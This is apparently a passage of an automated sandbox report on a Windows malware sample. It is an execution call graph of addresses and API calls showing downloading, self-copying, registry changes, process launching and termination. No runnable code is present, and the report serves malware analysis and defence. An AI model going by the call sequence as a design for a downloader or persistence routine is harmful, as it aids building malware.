                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: kernel32.dll
                    • API String ID: 1646373207-1793498882
                    • Opcode ID: 1ed5db4020c25c175b7d43ba4711acbe919fc3f21b09fb8a6ee91cff5326ae60
                    • Instruction ID: b46ded58d160a09ac0b8c881abd56e444b84381e14997cb6638cbe4c6c298f27
                    • Opcode Fuzzy Hash: 1ed5db4020c25c175b7d43ba4711acbe919fc3f21b09fb8a6ee91cff5326ae60
                    • Instruction Fuzzy Hash: F5F0F6B1144289AFDF708EA4DC44BDE37E4EB05700F50042AEA09CB241DF348685CB24

                    Execution Graph

                    Execution Coverage:2%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:34%
                    Total number of Nodes:805
                    Total number of Limit Nodes:91
                    execution_graph 44673 423f84 44674 423f90 __setmode 44673->44674 44710 432603 GetStartupInfoW 44674->44710 44677 423f95 44712 4278d5 GetProcessHeap 44677->44712 44678 423fed 44679 423ff8 44678->44679 45042 42411a 58 API calls 3 library calls 44678->45042 44713 425141 44679->44713 44682 423ffe 44683 424009 __RTC_Initialize 44682->44683 45043 42411a 58 API calls 3 library calls 44682->45043 44734 428754 44683->44734 44686 424018 44687 424024 GetCommandLineW 44686->44687 45044 42411a 58 API calls 3 library calls 44686->45044 44753 43235f GetEnvironmentStringsW 44687->44753 44690 424023 44690->44687 44693 42403e 44694 424049 44693->44694 45045 427c2e 58 API calls 3 library calls 44693->45045 44763 4321a1 44694->44763 44698 42405a 44777 427c68 44698->44777 44701 424062 44702 42406d __wwincmdln 44701->44702 45047 427c2e 58 API calls 3 library calls 44701->45047 44783 419f90 44702->44783 44705 424081 44706 424090 44705->44706 45039 427f3d 44705->45039 45048 427c59 58 API calls _doexit 44706->45048 44709 424095 __setmode 44711 432619 44710->44711 44711->44677 44712->44678 45049 427d6c 36 API calls 2 library calls 44713->45049 44715 425146 45050 428c48 InitializeCriticalSectionAndSpinCount __mtinitlocknum 44715->45050 44717 42514b 44718 42514f 44717->44718 45052 4324f7 TlsAlloc 44717->45052 45051 4251b7 61 API calls 2 library calls 44718->45051 44721 425154 44721->44682 44722 425161 44722->44718 44723 42516c 44722->44723 45053 428c96 44723->45053 44726 4251ae 45061 4251b7 61 API calls 2 library calls 44726->45061 44729 42518d 44729->44726 44731 425193 44729->44731 44730 4251b3 44730->44682 45060 42508e 58 API calls 4 library calls 44731->45060 44733 42519b GetCurrentThreadId 44733->44682 44735 428760 __setmode 44734->44735 45073 428af7 44735->45073 44737 428767 44738 428c96 __calloc_crt 58 API calls 44737->44738 44739 428778 44738->44739 44740 4287e3 GetStartupInfoW 44739->44740 44741 428783 @_EH4_CallFilterFunc@8 __setmode 44739->44741 44747 4287f8 44740->44747 44750 428927 44740->44750 44741->44686 44742 4289ef 45082 4289ff LeaveCriticalSection _doexit 44742->45082 44744 428c96 __calloc_crt 58 API calls 44744->44747 44745 428974 GetStdHandle 44745->44750 44746 428987 GetFileType 44746->44750 44747->44744 44749 428846 44747->44749 44747->44750 44748 42887a GetFileType 44748->44749 44749->44748 44749->44750 45080 43263e InitializeCriticalSectionAndSpinCount 44749->45080 44750->44742 44750->44745 44750->44746 45081 43263e InitializeCriticalSectionAndSpinCount 44750->45081 44754 432370 44753->44754 44755 424034 44753->44755 45085 428cde 58 API calls 2 library calls 44754->45085 44759 431f64 GetModuleFileNameW 44755->44759 44757 432396 ___check_float_string 44758 4323ac FreeEnvironmentStringsW 44757->44758 44758->44755 44760 431f98 _wparse_cmdline 44759->44760 44762 431fd8 _wparse_cmdline 44760->44762 45086 428cde 58 API calls 2 library calls 44760->45086 44762->44693 44764 4321ba __wsetenvp 44763->44764 44768 42404f 44763->44768 44765 428c96 __calloc_crt 58 API calls 44764->44765 44773 4321e3 __wsetenvp 44765->44773 44766 43223a 45088 420bed 58 API calls 2 library calls 44766->45088 44768->44698 45046 427c2e 58 API calls 3 library calls 44768->45046 44769 428c96 __calloc_crt 58 API calls 44769->44773 44770 43225f 45089 420bed 58 API calls 2 library calls 44770->45089 44773->44766 44773->44768 44773->44769 44773->44770 44774 432276 44773->44774 45087 42962f 58 API calls __get_pgmptr 44773->45087 45090 4242fd 8 API calls 2 library calls 44774->45090 44776 432282 44779 427c74 __IsNonwritableInCurrentImage 44777->44779 45091 43aeb5 44779->45091 44780 427c92 __initterm_e 44782 427cb1 __cinit __IsNonwritableInCurrentImage 44780->44782 45094 4219ac 67 API calls __cinit 44780->45094 44782->44701 44784 419fa0 __ftell_nolock 44783->44784 45095 40cf10 44784->45095 44786 419fb0 44787 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44786->44787 44788 419fb4 44786->44788 44789 419fe4 GetLastError 44787->44789 44790 419fe6 44787->44790 45319 4124e0 109 API calls _memset 44788->45319 44789->44790 45109 41d3c0 44790->45109 44793 419fb9 44793->44705 44795 41a022 45112 41d340 44795->45112 44796 41b669 45417 44f23e 59 API calls 2 library calls 44796->45417 44798 41b673 45418 44f23e 59 API calls 2 library calls 44798->45418 44803 41a065 45117 413a90 44803->45117 44807 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44808 41a33d GlobalFree 44807->44808 44823 41a196 44807->44823 44809 41a354 44808->44809 44810 41a45c 44808->44810 44812 412220 76 API calls 44809->44812 45173 412220 44810->45173 44811 41a100 44811->44807 44814 41a359 44812->44814 44816 41a466 44814->44816 45188 40ef50 44814->45188 44815 41a1cc lstrcmpW lstrcmpW 44815->44823 44816->44705 44818 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44818->44823 44819 41a48f 44822 41a4ef 44819->44822 45193 413ea0 44819->45193 44821 420235 60 API calls _TranslateName 44821->44823 44825 411cd0 92 API calls 44822->44825 44823->44808 44823->44815 44823->44818 44823->44821 44824 41a361 44823->44824 45133 423c92 44824->45133 44827 41a563 44825->44827 44860 41a5db 44827->44860 45214 414690 44827->45214 44829 41a395 OpenProcess 44831 41a402 44829->44831 44832 41a3a9 WaitForSingleObject CloseHandle 44829->44832 45136 411cd0 44831->45136 44832->44831 44837 41a3cb 44832->44837 44833 41a6f9 45321 411a10 8 API calls 44833->45321 44834 41a5a9 44839 414690 59 API calls 44834->44839 44853 41a3e2 GlobalFree 44837->44853 44854 41a3d4 Sleep 44837->44854 45320 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44837->45320 44838 41a6fe 44841 41a8b6 CreateMutexA 44838->44841 44842 41a70f 44838->44842 44844 41a5d4 44839->44844 44840 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 44845 41a451 44840->44845 44847 41a8ca 44841->44847 44846 41a7dc 44842->44846 44858 40ef50 58 API calls 44842->44858 45237 40d240 CoInitialize 44844->45237 44845->44705 44849 40ef50 58 API calls 44846->44849 44852 40ef50 58 API calls 44847->44852 44848 41a624 GetVersion 44848->44833 44850 41a632 lstrcpyW lstrcatW lstrcatW 44848->44850 44855 41a7ec 44849->44855 44856 41a674 _memset 44850->44856 44863 41a8da 44852->44863 44857 41a3f7 44853->44857 44854->44829 44859 41a7f1 lstrlenA 44855->44859 44862 41a6b4 ShellExecuteExW 44856->44862 44857->44705 44865 41a72f 44858->44865 45323 420c62 44859->45323 44860->44833 44860->44838 44860->44841 44860->44848 44862->44838 44884 41a6e3 44862->44884 44866 413ea0 59 API calls 44863->44866 44879 41a92f 44863->44879 44864 41a810 _memset 44868 41a81e MultiByteToWideChar lstrcatW 44864->44868 44867 413ea0 59 API calls 44865->44867 44870 41a780 44865->44870 44866->44863 44867->44865 44868->44859 44869 41a847 lstrlenW 44868->44869 44871 41a8a0 CreateMutexA 44869->44871 44872 41a856 44869->44872 44873 41a792 44870->44873 44874 41a79c CreateThread 44870->44874 44871->44847 45340 40e760 95 API calls 44872->45340 45322 413ff0 59 API calls ___check_float_string 44873->45322 44874->44846 44878 41a7d0 44874->44878 45722 41dbd0 95 API calls 4 library calls 44874->45722 44877 41a860 CreateThread WaitForSingleObject 44877->44871 45723 41e690 203 API calls 8 library calls 44877->45723 44878->44846 45341 415c10 44879->45341 44881 41a98c 45356 412840 60 API calls 44881->45356 44883 41a997 45357 410fc0 93 API calls 4 library calls 44883->45357 44884->44705 44886 41a9ab 44887 41a9c2 lstrlenA 44886->44887 44887->44884 44889 41a9d8 44887->44889 44888 415c10 59 API calls 44890 41aa23 44888->44890 44889->44888 45358 412840 60 API calls 44890->45358 44892 41aa2e lstrcpyA 44895 41aa4b 44892->44895 44894 415c10 59 API calls 44896 41aa90 44894->44896 44895->44894 44897 40ef50 58 API calls 44896->44897 44898 41aaa0 44897->44898 44899 413ea0 59 API calls 44898->44899 44900 41aaf5 44898->44900 44899->44898 45359 413ff0 59 API calls ___check_float_string 44900->45359 44902 41ab1d 45360 412900 44902->45360 44904 40ef50 58 API calls 44906 41abc5 44904->44906 44905 41ab28 _memmove 44905->44904 44907 413ea0 59 API calls 44906->44907 44908 41ac1e 44906->44908 44907->44906 45365 413ff0 59 API calls ___check_float_string 44908->45365 44910 41ac46 44911 412900 60 API calls 44910->44911 44913 41ac51 _memmove 44911->44913 44912 40ef50 58 API calls 44914 41acee 44912->44914 44913->44912 44915 413ea0 59 API calls 44914->44915 44916 41ad43 44914->44916 44915->44914 45366 413ff0 59 API calls ___check_float_string 44916->45366 44918 41ad6b 44919 412900 60 API calls 44918->44919 44922 41ad76 _memmove 44919->44922 44920 415c10 59 API calls 44921 41ae2a 44920->44921 45367 413580 59 API calls 44921->45367 44922->44920 44924 41ae3c 44925 415c10 59 API calls 44924->44925 44926 41ae76 44925->44926 45368 413580 59 API calls 44926->45368 44928 41ae82 44929 415c10 59 API calls 44928->44929 44930 41aebc 44929->44930 45369 413580 59 API calls 44930->45369 44932 41aec8 44933 415c10 59 API calls 44932->44933 44934 41af02 44933->44934 45370 413580 59 API calls 44934->45370 44936 41af0e 44937 415c10 59 API calls 44936->44937 44938 41af48 44937->44938 45371 413580 59 API calls 44938->45371 44940 41af54 44941 415c10 59 API calls 44940->44941 44942 41af8e 44941->44942 45372 413580 59 API calls 44942->45372 44944 41af9a 44945 415c10 59 API calls 44944->44945 44946 41afd4 44945->44946 45373 413580 59 API calls 44946->45373 44948 41afe0 45374 413100 59 API calls 44948->45374 44950 41b001 45375 413580 59 API calls 44950->45375 44952 41b025 45376 413100 59 API calls 44952->45376 44954 41b03c 45377 413580 59 API calls 44954->45377 44956 41b059 45378 413100 59 API calls 44956->45378 44958 41b070 45379 413580 59 API calls 44958->45379 44960 41b07c 45380 413100 59 API calls 44960->45380 44962 41b093 45381 413580 59 API calls 44962->45381 44964 41b09f 45382 413100 59 API calls 44964->45382 44966 41b0b6 45383 413580 59 API calls 44966->45383 44968 41b0c2 45384 413100 59 API calls 44968->45384 44970 41b0d9 45385 413580 59 API calls 44970->45385 44972 41b0e5 45386 413100 59 API calls 44972->45386 44974 41b0fc 45387 413580 59 API calls 44974->45387 44976 41b108 44978 41b130 44976->44978 45388 41cdd0 59 API calls 44976->45388 44979 40ef50 58 API calls 44978->44979 44980 41b16e 44979->44980 44982 41b1a5 GetUserNameW 44980->44982 45389 412de0 59 API calls 44980->45389 44983 41b1c9 44982->44983 45390 412c40 44983->45390 44985 41b1d8 45397 412bf0 59 API calls 44985->45397 44987 41b1ea 45398 40ecb0 60 API calls 2 library calls 44987->45398 44989 41b2f5 45401 4136c0 59 API calls 44989->45401 44991 41b308 45402 40ca70 59 API calls 44991->45402 44993 41b311 45403 4130b0 59 API calls 44993->45403 44995 412c40 59 API calls 45010 41b1f3 44995->45010 44996 41b322 45404 40c740 120 API calls 4 library calls 44996->45404 44998 412900 60 API calls 44998->45010 44999 41b327 45405 4111c0 169 API calls 2 library calls 44999->45405 45002 41b33b 45406 41ba10 LoadCursorW RegisterClassExW 45002->45406 45004 41b343 45407 41ba80 CreateWindowExW ShowWindow UpdateWindow 45004->45407 45005 413100 59 API calls 45005->45010 45007 41b34b 45011 41b34f 45007->45011 45408 410a50 65 API calls 45007->45408 45010->44989 45010->44995 45010->44998 45010->45005 45399 413580 59 API calls 45010->45399 45400 40f1f0 59 API calls 45010->45400 45011->44884 45012 41b379 45409 413100 59 API calls 45012->45409 45014 41b3a5 45410 413580 59 API calls 45014->45410 45016 41b48b 45416 41fdc0 CreateThread 45016->45416 45018 41b49f GetMessageW 45019 41b4ed 45018->45019 45020 41b4bf 45018->45020 45023 41b502 PostThreadMessageW 45019->45023 45024 41b55b 45019->45024 45021 41b4c5 TranslateMessage DispatchMessageW GetMessageW 45020->45021 45021->45019 45021->45021 45025 41b510 PeekMessageW 45023->45025 45026 41b564 PostThreadMessageW 45024->45026 45027 41b5bb 45024->45027 45029 41b546 WaitForSingleObject 45025->45029 45030 41b526 DispatchMessageW PeekMessageW 45025->45030 45028 41b570 PeekMessageW 45026->45028 45027->45011 45033 41b5d2 CloseHandle 45027->45033 45031 41b5a6 WaitForSingleObject 45028->45031 45032 41b586 DispatchMessageW PeekMessageW 45028->45032 45029->45024 45029->45025 45030->45029 45030->45030 45031->45027 45031->45028 45032->45031 45032->45032 45033->45011 45038 41b3b3 45038->45016 45411 41c330 59 API calls 45038->45411 45412 41c240 59 API calls 45038->45412 45413 41b8b0 59 API calls 45038->45413 45414 413260 59 API calls 45038->45414 45415 41fa10 CreateThread 45038->45415 45724 427e0e 45039->45724 45041 427f4c 45041->44706 45042->44679 45043->44683 45044->44690 45048->44709 45049->44715 45050->44717 45051->44721 45052->44722 45054 428c9d 45053->45054 45056 425179 45054->45056 45058 428cbb 45054->45058 45062 43b813 45054->45062 45056->44726 45059 432553 TlsSetValue 45056->45059 45058->45054 45058->45056 45070 4329c9 Sleep 45058->45070 45059->44729 45060->44733 45061->44730 45063 43b81e 45062->45063 45068 43b839 45062->45068 45064 43b82a 45063->45064 45063->45068 45071 425208 58 API calls __getptd_noexit 45064->45071 45066 43b849 HeapAlloc 45066->45068 45069 43b82f 45066->45069 45068->45066 45068->45069 45072 42793d DecodePointer 45068->45072 45069->45054 45070->45058 45071->45069 45072->45068 45074 428b1b EnterCriticalSection 45073->45074 45075 428b08 45073->45075 45074->44737 45083 428b9f 58 API calls 9 library calls 45075->45083 45077 428b0e 45077->45074 45084 427c2e 58 API calls 3 library calls 45077->45084 45080->44749 45081->44750 45082->44741 45083->45077 45085->44757 45086->44762 45087->44773 45088->44768 45089->44768 45090->44776 45092 43aeb8 EncodePointer 45091->45092 45092->45092 45093 43aed2 45092->45093 45093->44780 45094->44782 45096 40cf32 _memset __ftell_nolock 45095->45096 45097 40cf4f InternetOpenW 45096->45097 45098 415c10 59 API calls 45097->45098 45099 40cf8a InternetOpenUrlW 45098->45099 45100 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 45099->45100 45106 40cfb2 45099->45106 45419 4156d0 45100->45419 45102 4156d0 59 API calls 45104 40d049 45102->45104 45103 40d000 45103->45102 45104->45106 45438 413010 59 API calls 45104->45438 45106->44786 45107 40d084 45107->45106 45439 413010 59 API calls 45107->45439 45444 41ccc0 45109->45444 45464 41cc50 45112->45464 45115 41a04d 45115->44798 45115->44803 45118 413ab2 45117->45118 45126 413ad0 GetModuleFileNameW PathRemoveFileSpecW 45117->45126 45119 413b00 45118->45119 45120 413aba 45118->45120 45472 44f23e 59 API calls 2 library calls 45119->45472 45121 423b4c 59 API calls 45120->45121 45123 413ac7 45121->45123 45123->45126 45473 44f1bb 59 API calls 3 library calls 45123->45473 45127 418400 45126->45127 45128 418437 45127->45128 45132 418446 45127->45132 45128->45132 45474 415d50 59 API calls ___check_float_string 45128->45474 45129 4184b9 45129->44811 45132->45129 45475 418d50 59 API calls 45132->45475 45476 431781 45133->45476 45494 42f7c0 45136->45494 45139 411d20 _memset 45140 411d40 RegQueryValueExW RegCloseKey 45139->45140 45141 411d8f 45140->45141 45141->45141 45142 415c10 59 API calls 45141->45142 45143 411dbf 45142->45143 45144 411dd1 lstrlenA 45143->45144 45145 411e7c 45143->45145 45496 413520 59 API calls 45144->45496 45146 411e94 6 API calls 45145->45146 45149 411ef5 UuidCreate UuidToStringW 45146->45149 45148 411df1 45150 411e3c PathFileExistsW 45148->45150 45151 411e00 45148->45151 45152 411f36 45149->45152 45150->45145 45153 411e52 45150->45153 45151->45148 45151->45150 45152->45152 45155 415c10 59 API calls 45152->45155 45154 411e6a 45153->45154 45157 414690 59 API calls 45153->45157 45163 4121d1 45154->45163 45156 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 45155->45156 45158 411f98 45156->45158 45160 411fce 45156->45160 45157->45154 45159 415c10 59 API calls 45158->45159 45159->45160 45161 415c10 59 API calls 45160->45161 45162 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 45161->45162 45162->45163 45164 41207c _memset 45162->45164 45163->44840 45165 412095 6 API calls 45164->45165 45166 412115 _memset 45165->45166 45167 412109 45165->45167 45169 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 45166->45169 45497 413260 59 API calls 45167->45497 45170 4121b2 45169->45170 45171 4121aa GetLastError 45169->45171 45172 4121c0 WaitForSingleObject 45170->45172 45171->45163 45172->45163 45172->45172 45174 42f7c0 __ftell_nolock 45173->45174 45175 41222d 7 API calls 45174->45175 45176 4122bd K32EnumProcesses 45175->45176 45177 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 45175->45177 45178 4122d3 45176->45178 45180 4122df 45176->45180 45177->45176 45178->44814 45179 412353 45179->44814 45180->45179 45181 4122f0 OpenProcess 45180->45181 45182 412346 CloseHandle 45181->45182 45183 41230a K32EnumProcessModules 45181->45183 45182->45179 45182->45181 45183->45182 45184 41231c K32GetModuleBaseNameW 45183->45184 45498 420235 45184->45498 45186 41233e 45186->45182 45187 412345 45186->45187 45187->45182 45189 420c62 _malloc 58 API calls 45188->45189 45192 40ef6e _memset 45189->45192 45190 40efdc 45190->44819 45191 420c62 _malloc 58 API calls 45191->45192 45192->45190 45192->45191 45192->45192 45194 413f05 45193->45194 45198 413eae 45193->45198 45195 413fb1 45194->45195 45196 413f18 45194->45196 45514 44f23e 59 API calls 2 library calls 45195->45514 45199 413fbb 45196->45199 45200 413f2d 45196->45200 45201 413f3d ___check_float_string 45196->45201 45198->45194 45205 413ed4 45198->45205 45515 44f23e 59 API calls 2 library calls 45199->45515 45200->45201 45513 416760 59 API calls 2 library calls 45200->45513 45201->44819 45207 413ed9 45205->45207 45208 413eef 45205->45208 45511 413da0 59 API calls ___check_float_string 45207->45511 45512 413da0 59 API calls ___check_float_string 45208->45512 45212 413ee9 45212->44819 45213 413eff 45213->44819 45215 4146a9 45214->45215 45216 41478c 45214->45216 45217 4146b6 45215->45217 45218 4146e9 45215->45218 45518 44f26c 59 API calls 3 library calls 45216->45518 45220 4146c2 45217->45220 45221 414796 45217->45221 45222 4147a0 45218->45222 45223 4146f5 45218->45223 45516 413340 59 API calls _memmove 45220->45516 45519 44f26c 59 API calls 3 library calls 45221->45519 45520 44f23e 59 API calls 2 library calls 45222->45520 45235 414707 ___check_float_string 45223->45235 45517 416950 59 API calls 2 library calls 45223->45517 45231 4146e0 45231->44834 45235->44834 45238 40d27d CoInitializeSecurity 45237->45238 45244 40d276 45237->45244 45239 414690 59 API calls 45238->45239 45240 40d2b8 CoCreateInstance 45239->45240 45241 40d2e3 VariantInit VariantInit VariantInit VariantInit 45240->45241 45242 40da3c CoUninitialize 45240->45242 45243 40d38e VariantClear VariantClear VariantClear VariantClear 45241->45243 45242->45244 45245 40d3e2 45243->45245 45246 40d3cc CoUninitialize 45243->45246 45244->44860 45521 40b140 45245->45521 45246->45244 45249 40d3f6 45526 40b1d0 45249->45526 45251 40d422 45252 40d426 CoUninitialize 45251->45252 45253 40d43c 45251->45253 45252->45244 45254 40b140 60 API calls 45253->45254 45256 40d449 45254->45256 45257 40b1d0 SysFreeString 45256->45257 45258 40d471 45257->45258 45259 40d496 CoUninitialize 45258->45259 45260 40d4ac 45258->45260 45259->45244 45262 40b140 60 API calls 45260->45262 45317 40d8cf 45260->45317 45263 40d4d5 45262->45263 45264 40b1d0 SysFreeString 45263->45264 45265 40d4fd 45264->45265 45266 40b140 60 API calls 45265->45266 45265->45317 45267 40d5ae 45266->45267 45268 40b1d0 SysFreeString 45267->45268 45269 40d5d6 45268->45269 45270 40b140 60 API calls 45269->45270 45269->45317 45271 40d679 45270->45271 45272 40b1d0 SysFreeString 45271->45272 45273 40d6a1 45272->45273 45274 40b140 60 API calls 45273->45274 45273->45317 45275 40d6b6 45274->45275 45276 40b1d0 SysFreeString 45275->45276 45277 40d6de 45276->45277 45278 40b140 60 API calls 45277->45278 45277->45317 45279 40d707 45278->45279 45280 40b1d0 SysFreeString 45279->45280 45281 40d72f 45280->45281 45282 40b140 60 API calls 45281->45282 45281->45317 45283 40d744 45282->45283 45284 40b1d0 SysFreeString 45283->45284 45285 40d76c 45284->45285 45285->45317 45530 423aaf GetSystemTimeAsFileTime 45285->45530 45287 40d77d 45532 423551 45287->45532 45292 412c40 59 API calls 45293 40d7b5 45292->45293 45294 412900 60 API calls 45293->45294 45295 40d7c3 45294->45295 45296 40b140 60 API calls 45295->45296 45297 40d7db 45296->45297 45298 40b1d0 SysFreeString 45297->45298 45299 40d7ff 45298->45299 45300 40b140 60 API calls 45299->45300 45299->45317 45301 40d8a3 45300->45301 45302 40b1d0 SysFreeString 45301->45302 45303 40d8cb 45302->45303 45304 40b140 60 API calls 45303->45304 45303->45317 45305 40d8ea 45304->45305 45306 40b1d0 SysFreeString 45305->45306 45307 40d912 45306->45307 45307->45317 45540 40b400 SysAllocString 45307->45540 45309 40d936 VariantInit VariantInit 45310 40b140 60 API calls 45309->45310 45311 40d985 45310->45311 45312 40b1d0 SysFreeString 45311->45312 45313 40d9e7 VariantClear VariantClear VariantClear 45312->45313 45314 40da10 45313->45314 45315 40da46 CoUninitialize 45313->45315 45544 42052a 78 API calls vswprintf 45314->45544 45315->45244 45317->45242 45319->44793 45320->44837 45321->44838 45322->44874 45324 420cdd 45323->45324 45332 420c6e 45323->45332 45712 42793d DecodePointer 45324->45712 45326 420ce3 45713 425208 58 API calls __getptd_noexit 45326->45713 45329 420ca1 RtlAllocateHeap 45329->45332 45339 420cd5 45329->45339 45331 420cc9 45710 425208 58 API calls __getptd_noexit 45331->45710 45332->45329 45332->45331 45336 420cc7 45332->45336 45337 420c79 45332->45337 45709 42793d DecodePointer 45332->45709 45711 425208 58 API calls __getptd_noexit 45336->45711 45337->45332 45704 427f51 58 API calls 2 library calls 45337->45704 45705 427fae 58 API calls 9 library calls 45337->45705 45706 427b0b 45337->45706 45339->44864 45340->44877 45342 415c66 45341->45342 45347 415c1e 45341->45347 45343 415c76 45342->45343 45344 415cff 45342->45344 45351 415c88 ___check_float_string 45343->45351 45718 416950 59 API calls 2 library calls 45343->45718 45719 44f23e 59 API calls 2 library calls 45344->45719 45347->45342 45352 415c45 45347->45352 45351->44881 45354 414690 59 API calls 45352->45354 45355 415c60 45354->45355 45355->44881 45356->44883 45357->44886 45358->44892 45359->44902 45361 413a90 59 API calls 45360->45361 45362 41294c MultiByteToWideChar 45361->45362 45363 418400 59 API calls 45362->45363 45364 41298d 45363->45364 45364->44905 45365->44910 45366->44918 45367->44924 45368->44928 45369->44932 45370->44936 45371->44940 45372->44944 45373->44948 45374->44950 45375->44952 45376->44954 45377->44956 45378->44958 45379->44960 45380->44962 45381->44964 45382->44966 45383->44968 45384->44970 45385->44972 45386->44974 45387->44976 45388->44978 45389->44980 45391 412c71 45390->45391 45392 412c5f 45390->45392 45395 4156d0 59 API calls 45391->45395 45393 4156d0 59 API calls 45392->45393 45394 412c6a 45393->45394 45394->44985 45396 412c8a 45395->45396 45396->44985 45397->44987 45398->45010 45399->45010 45400->45010 45401->44991 45402->44993 45403->44996 45404->44999 45405->45002 45406->45004 45407->45007 45408->45012 45409->45014 45410->45038 45411->45038 45412->45038 45413->45038 45414->45038 45415->45038 45720 41f130 218 API calls _TranslateName 45415->45720 45416->45018 45721 41fd80 64 API calls 45416->45721 45420 415735 45419->45420 45425 4156de 45419->45425 45421 4157bc 45420->45421 45422 41573e 45420->45422 45443 44f23e 59 API calls 2 library calls 45421->45443 45431 415750 ___check_float_string 45422->45431 45442 416760 59 API calls 2 library calls 45422->45442 45425->45420 45429 415704 45425->45429 45432 415709 45429->45432 45433 41571f 45429->45433 45431->45103 45440 413ff0 59 API calls ___check_float_string 45432->45440 45441 413ff0 59 API calls ___check_float_string 45433->45441 45436 41572f 45436->45103 45437 415719 45437->45103 45438->45107 45439->45106 45440->45437 45441->45436 45442->45431 45450 423b4c 45444->45450 45446 41ccca 45449 41a00a 45446->45449 45460 44f1bb 59 API calls 3 library calls 45446->45460 45449->44795 45449->44796 45454 423b54 45450->45454 45451 420c62 _malloc 58 API calls 45451->45454 45452 423b6e 45452->45446 45454->45451 45454->45452 45455 423b72 std::exception::exception 45454->45455 45461 42793d DecodePointer 45454->45461 45462 430eca RaiseException 45455->45462 45457 423b9c 45463 430d91 58 API calls _free 45457->45463 45459 423bae 45459->45446 45461->45454 45462->45457 45463->45459 45465 423b4c 59 API calls 45464->45465 45466 41cc5d 45465->45466 45468 41cc64 45466->45468 45471 44f1bb 59 API calls 3 library calls 45466->45471 45468->45115 45470 41d740 59 API calls 45468->45470 45470->45115 45474->45132 45475->45132 45479 431570 45476->45479 45480 431580 45479->45480 45481 431586 45480->45481 45486 4315ae 45480->45486 45490 425208 58 API calls __getptd_noexit 45481->45490 45483 43158b 45491 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45483->45491 45487 4315cf wcstoxl 45486->45487 45492 42e883 GetStringTypeW 45486->45492 45489 41a36e lstrcpyW lstrcpyW 45487->45489 45493 425208 58 API calls __getptd_noexit 45487->45493 45489->44829 45490->45483 45491->45489 45492->45486 45493->45489 45495 411cf2 RegOpenKeyExW 45494->45495 45495->45139 45495->45163 45496->45148 45497->45166 45499 420241 45498->45499 45500 4202b6 45498->45500 45503 420266 45499->45503 45508 425208 58 API calls __getptd_noexit 45499->45508 45510 4202c8 60 API calls 3 library calls 45500->45510 45502 4202c3 45502->45186 45503->45186 45505 42024d 45509 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45505->45509 45507 420258 45507->45186 45508->45505 45509->45507 45510->45502 45511->45212 45512->45213 45513->45201 45516->45231 45517->45235 45518->45221 45519->45222 45522 423b4c 59 API calls 45521->45522 45523 40b164 45522->45523 45524 40b177 SysAllocString 45523->45524 45525 40b194 45523->45525 45524->45525 45525->45249 45527 40b1de 45526->45527 45529 40b202 45526->45529 45528 40b1f5 SysFreeString 45527->45528 45527->45529 45528->45529 45529->45251 45531 423add __aulldiv 45530->45531 45531->45287 45545 43035d 45532->45545 45534 42355a 45536 40d78f 45534->45536 45553 423576 45534->45553 45537 4228e0 45536->45537 45657 42279f 45537->45657 45541 40b423 45540->45541 45542 40b41d 45540->45542 45543 40b42d VariantClear 45541->45543 45542->45309 45543->45309 45544->45317 45586 42501f 58 API calls 4 library calls 45545->45586 45547 430369 45550 43038d 45547->45550 45587 425208 58 API calls __getptd_noexit 45547->45587 45548 430363 45548->45547 45548->45550 45588 428cde 58 API calls 2 library calls 45548->45588 45550->45534 45551 43036e 45551->45534 45554 423591 45553->45554 45555 4235a9 _memset 45553->45555 45597 425208 58 API calls __getptd_noexit 45554->45597 45555->45554 45562 4235c0 45555->45562 45557 423596 45598 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45557->45598 45559 4235cb 45599 425208 58 API calls __getptd_noexit 45559->45599 45560 4235e9 45589 42fb64 45560->45589 45562->45559 45562->45560 45564 4235ee 45600 42f803 58 API calls __get_pgmptr 45564->45600 45566 4235f7 45567 4237e5 45566->45567 45601 42f82d 58 API calls __get_pgmptr 45566->45601 45614 4242fd 8 API calls 2 library calls 45567->45614 45570 423609 45570->45567 45602 42f857 45570->45602 45571 4237ef 45573 42361b 45573->45567 45574 423624 45573->45574 45575 42369b 45574->45575 45577 423637 45574->45577 45612 42f939 58 API calls 4 library calls 45575->45612 45609 42f939 58 API calls 4 library calls 45577->45609 45578 4236a2 45585 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 45578->45585 45613 42fbb4 58 API calls 4 library calls 45578->45613 45580 42364f 45580->45585 45610 42fbb4 58 API calls 4 library calls 45580->45610 45583 423668 45583->45585 45611 42f939 58 API calls 4 library calls 45583->45611 45585->45536 45586->45548 45587->45551 45588->45547 45590 42fb70 __setmode 45589->45590 45591 42fba5 __setmode 45590->45591 45592 428af7 __lock 58 API calls 45590->45592 45591->45564 45593 42fb80 45592->45593 45594 42fb93 45593->45594 45615 42fe47 45593->45615 45644 42fbab LeaveCriticalSection _doexit 45594->45644 45597->45557 45598->45585 45599->45585 45600->45566 45601->45570 45603 42f861 45602->45603 45604 42f876 45602->45604 45655 425208 58 API calls __getptd_noexit 45603->45655 45604->45573 45606 42f866 45656 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45606->45656 45608 42f871 45608->45573 45609->45580 45610->45583 45611->45585 45612->45578 45613->45585 45614->45571 45616 42fe53 __setmode 45615->45616 45617 428af7 __lock 58 API calls 45616->45617 45618 42fe71 __tzset_nolock 45617->45618 45619 42f857 __tzset_nolock 58 API calls 45618->45619 45620 42fe86 45619->45620 45631 42ff25 __tzset_nolock 45620->45631 45645 42f803 58 API calls __get_pgmptr 45620->45645 45623 42fe98 45623->45631 45646 42f82d 58 API calls __get_pgmptr 